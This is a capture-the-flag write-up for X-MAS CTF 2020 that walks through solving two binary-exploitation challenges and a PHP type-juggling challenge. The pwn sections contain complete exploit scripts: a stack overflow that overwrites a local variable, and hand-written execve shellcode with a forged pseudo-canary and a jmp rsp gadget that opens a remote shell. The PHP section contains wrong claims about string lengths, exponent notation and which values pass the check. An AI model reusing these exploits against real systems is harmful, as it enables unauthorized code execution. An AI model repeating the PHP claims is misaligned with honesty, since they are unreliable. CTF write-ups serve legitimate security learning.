1 of 6

X-MAS CTF 2020

I didn't manage to solve a huge number of these - I was quite busy, plus I suck - but I'll dump some writeups here for those I caught up on later.

Pwn

Do I Know You?

If we disassemble, the solution is pretty clear.

[...]
|           0x55c00f08685d      4889c7         mov rdi, rax
│           0x55c00f086860      b800000000     mov eax, 0
│           0x55c00f086865      e846feffff     call sym.imp.gets
│           0x55c00f08686a      488b55f0       mov rdx, qword [var_10h]
│           0x55c00f08686e      b8efbeadde     mov eax, 0xdeadbeef
│           0x55c00f086873      4839c2         cmp rdx, rax
│       ┌─< 0x55c00f086876      7522           jne 0x55c00f08689a
│       │   0x55c00f086878      488d3de90000.  lea rdi, str.X_MAS_Fake_flag...
[...]

gets() is used to take in input, then the contents of another local variable are compared to 0xdeadbeef. Basic buffer overflow then overwrite a local variable:

from pwn import *

elf = context.binary = ELF('./chall')
p = remote('challs.xmas.htsp.ro', 2008)

payload = b'A' * 32
payload += p64(0xdeadbeef)

p.sendlineafter('you?\n', payload)
print(p.recvuntil('}'))

X-MAS{ah_yes__i_d0_rememb3r_you}

Naughty

Overview

We receive a file called chall. NX is disabled, which is helpful. We inject shellcode, use a jmp rsp gadget and execute our own shellcode.

Decompilation

main() is a fairly simple binary:

int main(int a1, char **a2, char **a3)
{
  char input[46]; // [rsp+0h] [rbp-30h] BYREF
  __int16 check; // [rsp+2Eh] [rbp-2h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  
  check = -6913;
  puts("Tell Santa what you want for XMAS");
  fgets(input, 71, stdin);
  puts("Nice. Hope you haven't been naughty");
  if ( check != -6913 )
  {
    puts("Oh no....no gifts for you this year :((");
    exit(0);
  }
  return 0LL;
}

The buffer is 48 bytes long. After the buffer there is 16-bit integer check, which acts as a canary. Then there are 8 bytes for the stored RBP. The total input it 71, meaning after the stored RBP we have 13 bytes of overflow, including the RIP. No ROP is possible.

Note that the value -6913 is actually 0xe4ff.

This was rather misleading as they gave you the LIBC.

Exploitation

Firstly:

from pwn import *

elf = context.binary = ELF('./chall', checksec=False)

if args.REMOTE:
    p = remote('challs.xmas.htsp.ro', 2000)
else:
    p = process()

jump_rsp = 0x40067f

Now we need some shellcode. pwntools' shellcraft.sh() is 2 bytes too long, so we'll have to make it manually.

The general payload is as follows:

/bin/sh\x00 so we have it in a known location (relative to RSP)
Shellcode
Padding
0xe4ff to overwrite the pseudo-canary
Padding
jmp rsp

Now we need to decide what shellcode we want to run. Well, since RSP points at the stack, we know that it will always be a static offset off our buffer. If we calculate it, we can just do

sub rsp, x
jmp rsp

And execute the other half of our code! And at this point RSP will be exactly 8 bytes off /bin/sh\x00, so we can use it to populate RDI as well!

exploit = b'/bin/sh\x00'
exploit += asm('''
    xor rsi, rsi
    xor rdx, rdx
    lea rdi, [rsp-8]
    mov rax, 0x3b
    syscall
''')    # rsi/rdx need to be null, rdi points at /bin/sh, rax execve syscall number
exploit += b'A' * (46 - len(exploit))    # padding
exploit += p16(0xe4ff)
exploit += b'B' * 8
exploit += p64(jump_rsp)
exploit += asm('''
    sub rsp, 0x38
    jmp rsp
''')    # RSP point to beginning of shellcode, use this to point RIP there
 
p.sendline(exploit)
p.interactive()

X-MAS{sant4_w1ll_f0rg1ve_y0u_th1s_y3ar}

Web

Not really my forte, but here we go, I can only get better.

PHP Master

Once we visit the URL, we are shown some code:

<?php

include('flag.php');

$p1 = $_GET['param1'];
$p2 = $_GET['param2'];

if(!isset($p1) || !isset($p2)) {
    highlight_file(__FILE__);
    die();
}

if(strpos($p1, 'e') === false && strpos($p2, 'e') === false  && strlen($p1) === strlen($p2) && $p1 !== $p2 && $p1[0] != '0' && $p1 == $p2) {
    die($flag);
}

?>

Clearly this is some type of Type Juggling exploit, but I'm not that familiar with it except for 0e md5 hashes and stuff. However, there are some restrictions here:

There can be no e character in either parameter
The two parameters must be the same length
They can't strictly equal each other (!==) but they must loosely equal each other (==)

PHP comparision is a known piece of junk, so we can find some weaknesses using PayloadsAllTheThings.

Once set of possible parameters is 01 and 1, as they are both two characters long and - according to PHP's loose comparison - equal each other (thanks to nrabulinski for this solution after the CTF). It appears that objetcs are automatically converted to numbers for loose comparisions, as loose only compares values while strict also compares types. Therefore the example above would both equal 1 under loose comparison.

Another, more interesting set is 200 and 2E3 (thanks to 03sunf). Note that 2E3 is an exponential, equivalent to 2 * 10^2. Once both are converted to integers, they pass the check.